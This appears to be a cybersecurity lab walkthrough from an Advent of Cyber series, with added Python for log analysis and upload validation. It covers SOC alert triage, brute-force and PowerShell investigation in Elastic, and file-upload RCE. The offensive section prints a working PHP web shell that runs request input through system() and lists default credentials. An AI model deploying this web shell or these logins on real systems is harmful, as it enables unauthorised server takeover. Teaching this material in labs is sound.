* What's with all these GitHub repos? Could they hide something else?

Task 8 (Log analysis) Day 2: One man's false positive is another man's potpourri.

Task includes a deployable machine.

The Story
It's the most wonderful time of the year again, and it's also the most stressful day for Wareville's Security Operations Center (SOC) team. Despite the overwhelming number of alerts generated by the new and noisy rules deployed, Wareville's SOC analysts have been processing them nonstop to ensure the safety of the town. However, the analysts are now burning out under the workload that needs clearing before Christmas. Numerous cases are still open, and similar alerts keep firing repeatedly, making them suspect that much of this mess is false positives. Now, help the awesome Wareville SOC team analyse the alerts to determine whether the rumour is true: that Mayor Malware is instigating chaos within the town.

TRUE POSITIVES OR FALSE POSITIVES?
In a SOC, events from different devices are sent to the SIEM, which is the single source of truth where all the information and events are aggregated. Certain rules (detection engineering rules) are defined to identify malicious or suspicious activity in these events. If an event or set of events fulfils the conditions of a rule, it triggers an alert. A SOC analyst then analyses the alert to determine whether it is a True Positive (TP) or a False Positive (FP). An alert is a TP if it reflects actual malicious activity. On the flip side, if the alert fired because of an activity that is not actually malicious, it is an FP. This seems simple in theory, but in practice separating TPs from FPs can be a tedious job. It can sometimes be very hard to tell an attacker from a system administrator.

MAKING A DECISION
While it is hard to differentiate between TPs and FPs, it is crucial to get it right. If a TP is wrongly classified as an FP, a cyber attack is missed, with all the impact that entails. If an FP is wrongly classified as a TP, precious time is spent on the FP, which may leave less attention for an actual attack. So, how exactly do we ensure that we perform this crucial job effectively? The pointers below can guide us.

Using the SOC Superpower
The SOC has a superpower. When analysts are unsure whether an activity was performed by a malicious actor or a legitimate user, they can simply confirm with the user. This privilege is not available to the attacker. A SOC analyst can send an email or call the relevant person to get confirmation of a certain activity. In mature organisations, any change that might trigger an alert in the SOC usually requires a Change Request to be created and approved through the IT change management process. Depending on the process, the SOC team can ask users to share Change Request details for confirmation.
Surely, if it is a legitimate and approved activity, it must have an approved Change Request.

Context
While the SOC superpower might seem to make things super easy, that is not always the case. Some cases act as Kryptonite to the SOC superpower:
* The organisation doesn't have a change request process in place.
* The performed activity was outside the scope of the change request or differed from what was approved.
* The activity that triggered the alert is not the kind of change that goes through change management, such as copying files to a certain location, uploading a file to a website, or a failed login to a system.
* An insider threat performed an activity they are not authorised to perform, whether intentionally or unintentionally.
* A user performed a malicious activity after being socially engineered by a threat actor.

In such scenarios, it is very important for the SOC analyst to understand the context of the activity and make a judgement call based on their analysis skills and security knowledge. While doing so, the analyst can look at the past behaviour of the user, or at the prevalence of a certain event or artefact throughout the organisation or a certain department. For example, if a certain user from the network team is using Wireshark, there is a good chance that other users from the same team also use it. However, Wireshark seen on a machine belonging to someone from HR or finance should rightfully raise some eyebrows.

Correlation
When building the context, the analyst must correlate different events to make a story or a timeline. Correlation means using the events before and after the alert to recreate a timeline. When performing correlation, it is important to note down the artefacts that can be used to connect the dots: IP addresses, machine names, usernames, hashes, file paths, and so on. Correlation requires forming hypotheses and checking that the evidence supports them.
A hypothesis can be something like: the user downloaded malware from a spoofed domain. The evidence to support this can be proxy logs showing that a website was visited, that the website used a spoofed domain name, and that a certain file was downloaded from it. Now, say we want to identify whether the malware executed through a vulnerability in an application or a user intentionally executed it. To see that, we might look at the parent process of the malware and the command-line parameters used to execute it. If the parent process is Windows Explorer, we can assume the user executed the malware intentionally (or was tricked into executing it via social engineering), but if the parent process is a web browser or a word processor, we can assume that the malware was not intentionally executed but ran because of a vulnerability in, or an abused feature (such as a macro) of, that application.

IS THIS A TP OR AN FP?
Like every SOC, the analysts in the Wareville SOC need to differentiate TPs from FPs. This becomes especially difficult near Christmas, when the analysts face alert fatigue; the chance of misclassifying TPs as FPs and vice versa is high at such times. The analysts therefore appreciate any help they can get at this crucial time. To make matters worse, the office of the Mayor has sent the analysts an alert informing them of multiple encoded PowerShell commands run on their systems. Perhaps we can help with that.

Connection Details
To help the analysts, start the Elastic SIEM in the attached VM by clicking the Start Machine button. The instance takes 5 minutes to initialise and for the Elastic login page to appear.
Once the machine is up and running, connect to the Elastic SIEM by visiting https://LAB_WEB_URL.p.thmlabs.com in your browser using the following credentials:
URL: https://LAB_WEB_URL.p.thmlabs.com
Username: elastic
Password: elastic

Once logged in, click the menu in the top-left corner and go to the Discover tab to see the events. According to the alert sent by the Mayor's office, the activity occurred on Dec 1st, 2024, between 0900 and 0930. We can set this as our time window by clicking the timeframe settings in the upper-right corner. Note that we need to click the Absolute tab and set the exact timeframe we want to view. Lastly, click the Update button to apply the changes.

After updating the settings, we see 21 events in the mentioned timeframe. In their current form, these events are not very readable. We can use the fields in the left pane to add columns to the results and make them more readable: hovering over a field name in the left pane shows the option to add that field as a column. Since we are looking for events related to PowerShell, we want the following details about the logs:
* The hostname where the command was run: add the host.hostname field as a column.
* The user who performed the activity: add the user.name field.
* The event.category field, to ensure we are looking at the correct event category.
* The actual commands run using PowerShell: add the process.command_line field.
* Whether the activity succeeded: add the event.outcome field.

Once we have added these fields as columns, the results become readable. Interesting! It looks like someone ran the same encoded PowerShell command on multiple machines. Another thing to note is that before each execution of the PowerShell command, we see an authentication event, which was successful.
This activity is observed individually on each machine, and the time difference between the login and the PowerShell command looks very precise. Best practice dictates that named accounts are used for any kind of administrator activity, so that there is accountability and attribution for each administrative action performed. The use of a generic admin account here therefore also seems suspicious. On asking, the analysts informed us that this account is used by two administrators, neither of whom was in the office when this activity occurred. Hmmm, something is definitely not right. Are these some of Glitch's shenanigans? Is Christmas in danger? We need to find out who ran these commands.

Let's also add the source.ip field as a column to find out who ran the PowerShell commands. Since the source.ip field is only available for the authentication events, we can filter out the process events to see if there is a pattern. To do that, hover over the event.category field in one of the process events; you will see the option to filter for this value (+ sign) or filter it out (- sign). Let's filter for authentication events by clicking the plus (+) sign beside it, so that only those are shown in the results. The output now renders only the authentication events. Since this result does not give useful insights on its own, remove the filter for now by clicking the x beside it.

Since the timeframe we previously used was for the PowerShell events, and the authentication events might have started before that, we need to expand the search to understand the context and the historical events for this user. Let's see if we have any events from the user from the 29th of November to the 1st of December by updating the time filter to cover these days. Note: remember to remove the event.category filter before this step.
Woah, there have been more than 6800 events in these three days, and we see a spike at the end of the logs. However, even though the time filter runs to the end of the 1st of December, we see no events after the successful PowerShell execution. There have also been a lot more authentication events in the previous days than on the 1st of December. To understand the events further, let's filter for user.name: service_admin and source.ip: 10.0.11.11 to narrow our search.

Uh-oh! It looks like all these events have been coming from the same user and the same IP address. We definitely need to investigate further. This also does not explain the spike. Let's filter for authentication events first by clicking the plus (+) button beside the category. Then, let's filter out this source IP to see if we can find the IP address that caused the spike; this can be done by clicking the minus (-) button beside it.

Scrolling down after applying the filters, we see many events for failed logins. We also see that the IP address responsible for the spike (ending in .255.1) differs from the one we saw for the events continuously coming in on the previous days (10.0.11.11). The analysts had previously investigated those earlier events and found that a script with expired credentials was causing the failed logins; that script has since been updated with a fresh set of credentials. Anyhow, this might just be another script. Let's find out.

Let's remove the source IP filter so we can focus on the authentication events close to the spike. After applying the new filter, we see that the failed logins stopped a little while after the successful login from the new IP. Our suspicions are rising. It seems that someone ran a brute-force attack on December 1st, as shown with the same filters applied above.
The results also show that the brute force succeeded: a successful authentication was followed quickly by PowerShell commands on the affected machines. Once the PowerShell commands had run, we saw no further login attempts. This looks like a TP, and it needs to be escalated so that McSkidy can help us respond to this incident.

CHRISTMAS IN DANGER?
The alarms have gone off, and McSkidy has been called in to take this incident further. The analysts have briefed McSkidy about the incident. McSkidy observed that nobody had actually looked at what the PowerShell command contained. Since the command was encoded, it needs to be decoded. McSkidy changed the filter to event.category: process to take a deeper look at the PowerShell commands. We can see the command in the process.command_line field:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==

McSkidy knows that encoded PowerShell commands are Base64 encoded and can be decoded using tools such as CyberChef. Since the command might contain sensitive information and therefore must not be submitted to a public portal, McSkidy spins up her own instance of CyberChef hosted locally. McSkidy starts by pasting the encoded part of the command into the Input pane. Since it is Base64, McSkidy uses two operations from the left pane: From Base64 and Decode text. Note that McSkidy configures Decode text to UTF-16LE (1200), because -EncodedCommand takes the Base64 of the command's UTF-16LE bytes; decoding the output as UTF-8 instead would leave a null byte between every character. The result provides a sigh of relief to McSkidy, who had feared that Christmas had been ruined. Someone had come in to help McSkidy and the team secure their defences, but who?

VILLAIN OR HERO?
McSkidy further analysed the secret hero and came to a startling revelation.
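The investigation above, and the correlation guidance in the Context and Correlation sections before it, is a chain of checks an analyst can also script against exported events: count failed logins per source IP to spot the burst, find the success that ends the burst, tie it to the process events that follow on the same host under the same user, and decode the -EncodedCommand payload. The following is an added example written for this edit, not the room's code or data: the events are constructed in the shape of the Elastic fields used above (the hostnames, timestamps and IPs, which come from the 192.0.2.0/24 and 198.51.100.0/24 documentation ranges, are made up), and only the encoded command is taken from the page. The decoding step is the same Base64 then UTF-16LE conversion McSkidy performs in CyberChef.

```python
import base64
import re
from collections import Counter
from datetime import datetime, timedelta

# The encoded command shown on this page; everything else below is constructed.
ENCODED = "SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA=="
PS_CMDLINE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand " + ENCODED


def _auth(ts, host, ip, outcome):
    return {"@timestamp": ts, "event.category": "authentication", "event.outcome": outcome,
            "host.hostname": host, "user.name": "service_admin", "source.ip": ip}


def _proc(ts, host, cmdline):
    return {"@timestamp": ts, "event.category": "process", "event.outcome": "success",
            "host.hostname": host, "user.name": "service_admin", "process.command_line": cmdline}


# Constructed sample events (not the room's SIEM data).
EVENTS = [
    # the scheduled script with stale credentials, failing quietly on earlier days
    _auth("2024-11-29T08:00:00.000Z", "ADM-01", "198.51.100.11", "failure"),
    _auth("2024-11-30T08:00:00.000Z", "ADM-01", "198.51.100.11", "failure"),
    # a burst of failures from a new source, then a success, then PowerShell
    *[_auth(f"2024-12-01T09:00:0{i}.000Z", "ADM-01", "192.0.2.50", "failure") for i in range(6)],
    _auth("2024-12-01T09:00:06.000Z", "ADM-01", "192.0.2.50", "success"),
    _proc("2024-12-01T09:00:07.000Z", "ADM-01", PS_CMDLINE),
    _auth("2024-12-01T09:01:00.000Z", "ADM-02", "192.0.2.50", "success"),
    _proc("2024-12-01T09:01:01.000Z", "ADM-02", PS_CMDLINE),
    # an unrelated interactive login with no process activity after it
    _auth("2024-12-01T10:00:00.000Z", "ADM-03", "198.51.100.7", "success"),
]


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ")


def failed_logins_by_ip(events) -> Counter:
    """How many failed authentications each source IP produced."""
    return Counter(e["source.ip"] for e in events
                   if e["event.category"] == "authentication" and e["event.outcome"] == "failure")


def find_brute_force(events, threshold=5, window=timedelta(minutes=5)):
    """IPs with >= threshold failures inside one window, plus the first success
    from that IP after the burst (None if the attempts never succeeded)."""
    auths = sorted((e for e in events if e["event.category"] == "authentication"),
                   key=lambda e: parse_ts(e["@timestamp"]))
    by_ip = {}
    for e in auths:
        by_ip.setdefault(e["source.ip"], []).append(e)
    hits = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["event.outcome"] == "failure"]
        for i in range(len(failures) - threshold + 1):
            t0 = parse_ts(failures[i]["@timestamp"])
            burst = [f for f in failures[i:] if parse_ts(f["@timestamp"]) - t0 <= window]
            if len(burst) >= threshold:
                burst_end = parse_ts(burst[-1]["@timestamp"])
                success = next((e for e in evs if e["event.outcome"] == "success"
                                and parse_ts(e["@timestamp"]) >= burst_end), None)
                hits.append((ip, len(burst), success))
                break
    return hits


def correlate_login_to_process(events, window=timedelta(seconds=30)):
    """Pair each successful login with process events on the same host, under the
    same user, within `window` after it: the login -> PowerShell pattern above."""
    procs = [e for e in events if e["event.category"] == "process"]
    pairs = []
    for login in events:
        if login["event.category"] != "authentication" or login["event.outcome"] != "success":
            continue
        t0 = parse_ts(login["@timestamp"])
        for p in procs:
            delta = parse_ts(p["@timestamp"]) - t0
            if (p["host.hostname"] == login["host.hostname"]
                    and p["user.name"] == login["user.name"]
                    and timedelta(0) <= delta <= window):
                pairs.append((login["source.ip"], p["host.hostname"], p["process.command_line"]))
    return pairs


# powershell.exe accepts -e, -ec, -en, -enc ... as prefixes of -EncodedCommand;
# -ep (ExecutionPolicy) does not match because the flag must be followed by whitespace.
_ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries Base64 of the command's UTF-16LE bytes, not UTF-8."""
    m = _ENCODED_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def investigate(events) -> dict:
    brute = find_brute_force(events)
    pairs = correlate_login_to_process(events)
    return {
        "brute_force_ips": [(ip, n, s["@timestamp"] if s else None) for ip, n, s in brute],
        "login_then_process": [(ip, host, decode_encoded_command(cmd)) for ip, host, cmd in pairs],
    }


if __name__ == "__main__":
    print(failed_logins_by_ip(EVENTS))
    for key, value in investigate(EVENTS).items():
        print(key, value)
```

The two failures from 198.51.100.11 never reach the threshold, so the noisy-but-known script does not show up as brute force, while the burst from 192.0.2.50 does, together with the success that ends it and the decoded command run on each host afterwards. The threshold and window are the knobs an analyst tunes against their own baseline; the constructed values here are only illustrative.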
The credentials used by the script on the machines that ran the Windows updates were outdated. Someone brute-forced the systems and fixed the credentials after successfully logging in. This was evident from the fact that each executed PowerShell command was preceded by a successful login from the same source IP that had generated the burst of failed logins. And what's even more startling? After McSkidy confirmed who owned the IP address, it turned out that it was Glitch who accessed ADM-01 and fixed the credentials. This meant that the people of Wareville had misunderstood Glitch, who was just trying to help shore up the defences. But if Glitch was the one helping the defences, who was trying to sabotage them? Was it the Mayor who informed the SOC about these 'suspicious' PowerShell commands? Just as alerts aren't always what they seem in a SOC, so it was here in Wareville with people. As hard as it is to differentiate between a TP and an FP, so it was with the Mayor and Glitch. However, McSkidy can perhaps use the evidence-based deduction skills learned in a SOC to make this distinction easier for the people of Wareville.

Answer the questions below
* What is the name of the account causing all the failed login attempts?
* How many failed logon attempts were observed?
* What is the IP address of Glitch?
* When did Glitch successfully log on to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
* What is the decoded command executed by Glitch to fix the systems of Wareville?
* If you enjoyed this task, feel free to check out the Investigating with ELK 101 room.

Task 9 (Log analysis) Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

Task includes a deployable machine.

The Story
Today's AoC challenge follows a rather unfortunate series of events for the Glitch.
Here is a little passage which sets the scene for today's task:

Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: ”Two days! InsnowSec”.
With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.
Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website?!?
He exploited it quick and made a report,
But before he could send arrived his transport.
In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of… the Glitch.

In this task, we will cover how the SOC team and their expert were able to find out what had happened (Operation Blue) and how the Glitch was able to gain access to the website in the first place (Operation Red). Let's get started, shall we?

LEARNING OBJECTIVES

* Learn about log analysis and tools like ELK.
* Learn about KQL and how it can be used to investigate logs using ELK.
* Learn about RCE (Remote Code Execution) and how it can be achieved via insecure file upload.

CONNECTING TO THE MACHINE

Before moving forward, review the questions in the connection card below:

Click on the green Start Machine button below to start the virtual machine for the practical. The practical VM may take 5 minutes to become accessible.

You will also need to start the AttackBox by pressing the Start AttackBox button at the top of the room. Alternatively, you can connect your own hacking machine by using the TryHackMe VPN.

OPERATION BLUE

In this section of the lesson, we will take a look at what tools and knowledge are required for the blue segment, that is, the investigation of the attack itself using tools that enable us to analyse the logs.
For the first part of Operation Blue, we will demonstrate how to use ELK to analyse the logs of a demonstration web app, WareVille Rails. Feel free to follow along for practice.

LOG ANALYSIS & INTRODUCING ELK

Log analysis is crucial to blue-team work, as you have likely discovered through this year's Advent of Cyber. Analysing logs can quickly become overwhelming, especially if you have multiple devices and services. ELK, or Elasticsearch, Logstash, and Kibana, combines data analytics and processing tools to make analysing logs much more manageable. ELK forms a dedicated stack that can aggregate logs from multiple sources into one central place.

Explaining how ELK collates and processes these logs is out of the scope of today's task. However, if you wish to learn more, you can check out the Investigating with ELK 101 room. For now, it's important to note that multiple processes behind the scenes achieve this.

The first part of today's task is to investigate the attack on Frosty Pines Resort's Hotel Management System to see what it looks like to a blue teamer. You will then test your web app skills by recreating the attack.

USING ELK

Upon loading the URL http://MACHINE_IP:5601/ within your AttackBox's browser, you will be greeted with the ELK home page. For today's task, we will use Kibana's Discover interface to review Apache2 logs. To access this, simply click on the three lines located at the top left of the page to open the slide-out tray. Under the Analytics heading, click on Discover.

We will need to select the collection that is relevant to us. A collection is a group of logs. For this stage of Operation Blue, we will be reviewing the logs present within the "wareville-rails" collection. To select this collection, click on the dropdown on the left of the display. Once you have done this, you will be greeted with a screen saying "No results match your search criteria". This is because no logs have been ingested within the last 15 minutes.
Do not panic; we will discuss how to change this shortly. To change the date and time, click the text located on the right side of the box that has the calendar icon. Select "Absolute" from the dropdown, where you can now select the start date and time. Next, click on the text on the right side of the arrow and repeat the process for the end date and time. For the WareVille Rails collection, we will need to set the start time to October 1 2024 00:00:00 and the end time to October 1 23:30:00. If you are stuck, refer to the GIF below. Please note that the day and time in this demonstration of WareVille Rails will differ from the times required to review the FrostyPines Resorts collection in the second half of the practical.

Now that we can see some entries, let's go over the basics of the Kibana Discover UI.

1. Search Bar: Here, we can place our search queries using KQL.
2. Index Pattern: An index pattern is a collection of logs. This can be from a specific host or, for example, multiple hosts with a similar purpose (such as multiple web servers). In this case, the index pattern is all logs relating to "wareville-rails".
3. Fields: This pane shows us the fields that Elasticsearch has parsed from the logs, for example timestamp, response type, and IP address.
4. Timeline: This visualisation displays the event count over a period of time.
5. Documents (Logs): These entries are the specific entries in the log file.
6. Time Filter: We can use this to narrow down a specific time frame (absolute). Alternatively, we can search for logs based on a relative window, e.g. "Last 7 days".

KIBANA QUERY LANGUAGE (KQL)

KQL, or Kibana Query Language, is an easy-to-use language that can be used to search documents for values, for example querying whether a value within a field exists or matches a given value. If you are familiar with Splunk, you may be thinking of SPL (Search Processing Language). For example, the query to search all documents for an IP address may look like ip.address: "10.10.10.10".
Alternatively, Kibana also allows using Lucene query syntax, an advanced language that supports features such as fuzzy terms (searches for terms that are similar to the one provided), regular expressions, etc. For today's task, we will stick with KQL, which is enabled by default. The table below contains a mini cheatsheet of KQL syntax that you may find helpful in today's task.

Query/Syntax | Description | Example
" " | The two quotation marks are used to search for specific values within the documents. Values in quotation marks are used for exact searches. | "TryHackMe"
* | The asterisk denotes a wildcard, which searches documents for similar matches to the value provided. | United* (would return United Kingdom and United States)
OR | This logical operator is used to show documents that contain either of the values provided. | "United Kingdom" OR "England"
AND | This logical operator is used to show documents that contain both values. | "Ben" AND "25"
: | This is used to search the (specified) field of a document for a value, such as an IP address. Note that the field you provide here will depend on the fields available in the index pattern. | ip.address: 10.10.10.10

INVESTIGATING A WEB ATTACK WITH ELK

Scenario: Thanks to our extensive intrusion detection capabilities, our systems alerted the SOC team to a web shell being uploaded to the WareVille Rails booking platform on Oct 1, 2024. Our task is to review the web server logs to determine how the attacker achieved this.

If you would like to follow along, ensure that you have the "wareville-rails" collection selected like so:

To investigate this scenario, let's change the time filter to show events for the day of the attack, setting the start date and time to "Oct 1, 2024 @ 00:00:00.000" and the end date and time to "Oct 2, 2024 @ 00:00:00.000". You will see the logs have now populated within the display. Please note that the quantity of entries (hits) in this task may differ from the amount on the practical VM.
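The filters this investigation applies in Kibana can be reproduced offline on a handful of constructed Apache lines. The Python below is an added example, not part of the room: it parses combined-format entries, implements the equivalent of clientip: <ip>, the "-" exclusion filter and a phrase search on the message field, and pulls the query parameters out of requests to a web shell (the 192.0.2.x addresses and the shell.php requests are constructed values).

```python
import re
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Apache combined log format, the shape of the Apache2 entries Kibana shows in this task.
LOG_RE = re.compile(
    r'(?P<clientip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<request>\S+) (?P<httpversion>[^"]+)" '
    r'(?P<response>\d{3}) (?P<bytes>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample lines, not exported from the room's VM. 192.0.2.0/24 is a
# documentation range; .10 is an ordinary visitor, .55 is the client of interest.
SAMPLE_LOGS = """\
192.0.2.10 - - [01/Oct/2024:11:20:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.55 - - [01/Oct/2024:11:31:07 +0000] "POST /profile.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.55 - - [01/Oct/2024:11:31:20 +0000] "GET /admin/assets/img/profile/shell.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
192.0.2.55 - - [01/Oct/2024:11:31:42 +0000] "GET /admin/assets/img/profile/shell.php?command=id HTTP/1.1" 200 420 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Oct/2024:11:32:00 +0000] "GET /login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

Doc = Dict[str, str]


def parse_logs(text: str) -> List[Doc]:
    """Turn raw lines into documents; like Logstash, keep the raw line as 'message'."""
    docs = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            doc = match.groupdict()
            doc["message"] = line
            docs.append(doc)
    return docs


def kql_field_query(docs: List[Doc], field: str, value: str, negate: bool = False) -> List[Doc]:
    """Equivalent of KQL `field: "value"`; negate=True mirrors the "-" filter button.

    'message' is a free-text field, so it is matched as a phrase; every other
    field here is treated as a keyword and must match exactly.
    """
    def hit(doc: Doc) -> bool:
        if field == "message":
            return value in doc.get("message", "")
        return doc.get(field) == value
    return [d for d in docs if hit(d) != negate]


def top_values(docs: List[Doc], field: str, n: int = 5) -> List[Tuple[str, int]]:
    """What clicking a field in the Fields pane shows: its most frequent values."""
    return Counter(d[field] for d in docs).most_common(n)


def web_shell_commands(docs: List[Doc], filename: str) -> List[Tuple[str, str, Dict[str, List[str]]]]:
    """For requests whose path names the web shell, return (clientip, path, query params).

    The query parameters are where the operator's commands end up, so they are
    the evidence an analyst wants to pull out first.
    """
    findings = []
    for d in docs:
        parts = urlsplit(d["request"])
        if parts.path.endswith("/" + filename):
            findings.append((d["clientip"], parts.path, parse_qs(parts.query)))
    return findings


if __name__ == "__main__":
    docs = parse_logs(SAMPLE_LOGS)
    print(top_values(docs, "clientip"))
    for finding in web_shell_commands(kql_field_query(docs, "clientip", "192.0.2.55"), "shell.php"):
        print(finding)
```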
An incredibly beneficial feature of ELK is that we can filter out noise. A web server (especially a popular one) will likely have a large number of logs from user traffic that are completely unrelated to the attack. Using the fields pane on the left, we can click on the "+" and "-" icons next to a field value to show only that value or to remove it from the display, respectively. Fun fact: clicking on these filters is actually just applying the relevant KQL syntax. Note in the GIF below how the logs are being filtered to only show logs containing the IP address 10.13.27.115 (reducing the count from 1,028 to 423 hits). We can combine filtering multiple fields in or out to drill down specifically into the logs. To remove applied filters, simply click on the "x" alongside the filter, just below the search bar.

In this investigation, let's look at the activity of the IP address 10.9.98.230. We can click on the "clientip" field to see the IPs with the most values. Using the timeline at the top, we can see that a lot of activity from this IP address took place between 11:30:00 and 11:35:00. This would be a good place to begin our analysis. Each log can be expanded by using the ">" icon located on the left of the log/document. Fortunately, the logs are pretty small in this instance, so we can browse through them to look for anything untoward.

After some digging, a few logs stand out. Looking at the request field, we can see that a file named "shell.php" has been accessed, with a few parameters, "c" and "d", containing commands. These are likely to be commands input into some form of web shell. Now that we have an initial lead, let's use a search query to find all logs that contain "shell.php". Using the search bar at the top, the query message: "shell.php" will search for all entries of "shell.php" in the message field of the logs.

OPERATION RED

In this section we will now take a look at the red aspect, in other words, the attack itself and how it was carried out.
WHY DO WEBSITES ALLOW FILE UPLOADS

File uploads are everywhere on websites, and for good reason. Users often need to upload files like profile pictures, invoices, or other documents to update their accounts, send receipts, or submit claims. These features make the user experience smoother and more efficient. But while this is convenient, it also creates a risk if file uploads aren't handled properly. If not properly secured, this feature can open up various vulnerabilities attackers can exploit.

FILE UPLOAD VULNERABILITIES

File upload vulnerabilities occur when a website doesn't properly handle the files that users upload. If the site doesn't check what kind of file is being uploaded, how big it is, or what it contains, it opens the door to all sorts of attacks. For example:

* RCE: Uploading a script that the server runs gives the attacker control over it.
* XSS: Uploading an HTML file that contains XSS code which will steal a cookie and send it back to the attacker's server.

These can happen if a site doesn't properly secure its file upload functionality.

WHY UNRESTRICTED FILE UPLOADS ARE DANGEROUS

Unrestricted file uploads can be particularly dangerous because they allow an attacker to upload any type of file. If the file's contents aren't properly validated to ensure only specific formats like PNG or JPG are accepted, an attacker could upload a malicious script, such as a PHP file or an executable, that the server might process and run. This can lead to code execution on the server, allowing attackers to take over the system. Examples of abuse through unrestricted file uploads include:

* Uploading a script that the server executes, leading to RCE.
* Uploading a crafted image file that triggers a vulnerability when processed by the server.
* Uploading a web shell and browsing to it directly using a browser.

USAGE OF WEAK CREDENTIALS

One of the easiest ways for attackers to break into systems is through weak or default credentials.
This can be an open door for attackers to gain unauthorised access. Default credentials are often found in systems where administrators fail to change the initial login details provided during setup. For attackers, trying a few common usernames and passwords can lead to easy access. Below are some examples of weak/default credentials that attackers might try:

Username | Password
admin | admin
administrator | administrator
admin@domainname | admin
guest | guest

Attackers can use tools or try these common credentials manually, which is often all it takes to break into the system.

WHAT IS REMOTE CODE EXECUTION (RCE)

Remote code execution (RCE) happens when an attacker finds a way to run their own code on a system. This is a highly dangerous vulnerability because it can allow the attacker to take control of the system, exfiltrate sensitive data, or compromise other connected systems.

WHAT IS A WEB SHELL

A web shell is a script that attackers upload to a vulnerable server, giving them remote control over it. Once a web shell is in place, attackers can run commands, manipulate files, and essentially use the compromised server as their own. They can even use it to launch attacks on other systems. For example, attackers could use a web shell to:

* Execute commands on the server
* Move laterally within the network
* Download sensitive data or pivot to other services

A web shell typically gives the attacker a web-based interface to run commands. Still, in some cases, attackers may use a reverse shell to establish a direct connection back to their system, allowing them to control the compromised machine remotely. Once an attacker has this level of access, they might attempt privilege escalation to gain even more control, such as achieving root access or moving deeper into the network.

Okay, now that we're familiar with a remote code execution vulnerability and how it works, let's take a look at how we would exploit it!
PRACTICE MAKES PERFECT

To understand how a file upload vulnerability can result in an RCE, the best approach is to get some hands-on experience with it. A handy (and ethical) way to do this is to find and download a reputable open-source web application which has this vulnerability built into it. Many open-source projects exist in places like GitHub, which can be run in your own environment to experiment and practice. In today's task, we will demonstrate achieving RCE via unrestricted file upload within an open-source railway management system that has this vulnerability built into it.

EXPLOITING RCE VIA FILE UPLOAD

Now we're going to go through how this vulnerability can be exploited. For now, you can just read along, but an opportunity to put this knowledge into practice is coming up. Once an RCE vulnerability has been identified that can be exploited via file upload, we need to create a malicious file that will allow remote code execution when uploaded. Below is an example PHP file which could be uploaded to exploit this vulnerability. Using your favourite text editor, copy and paste the below code and save it as shell.php.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  <input type="text" name="command" autofocus id="command" size="50">
  <input type="submit" value="Execute">
</form>
<pre>
<?php
  if(isset($_GET['command'])) {
    system($_GET['command'] . ' 2>&1');
  }
?>
</pre>
</body>
</html>

The above script, when accessed, displays an input field. Whatever is entered in this input field is then run against the underlying operating system using the system() PHP function, and the output is displayed to the user. This is the perfect file to upload to the vulnerable rail system reservation application. The vulnerability surrounds the upload of a new profile image.
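For contrast, here is what the profile-image upload handler should have done with that file. The Python below is an added example, not code from the rail application or the room: UPLOAD_DIR and MAX_BYTES are assumed values, and the checks (extension allowlist, file signature, server-chosen name, storage outside the executable web root) are exactly the ones the vulnerable upload lacks.

```python
import os
import secrets
from typing import Tuple

UPLOAD_DIR = "/srv/app-data/profile-images"   # assumed: a directory the web server never executes from
MAX_BYTES = 2 * 1024 * 1024                    # assumed 2 MiB ceiling for a profile picture

# Allowed extensions and the file signature ("magic bytes") each must start with.
ALLOWED_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
SCRIPT_PARTS = {"php", "phtml", "phar", "php5", "html", "htm"}


def unsafe_target_path(upload_dir: str, client_filename: str) -> str:
    """What the vulnerable app effectively does: trust the client's file name as-is.

    A name ending in .php stored under the web root is served as PHP, which is the
    whole RCE.
    """
    return os.path.join(upload_dir, client_filename)


def validate_profile_image(client_filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Only the bytes decide; the name and the client's
    Content-Type header are never trusted."""
    if not data or len(data) > MAX_BYTES:
        return False, "size out of range"
    # Keep only the final path component so the client cannot pick a directory.
    base = os.path.basename(client_filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension {ext or '(none)'} not allowed"
    # Reject names like image.php.png: every dot-separated part must be harmless.
    if any(part.lower() in SCRIPT_PARTS for part in stem.split(".")):
        return False, "script extension inside file name"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
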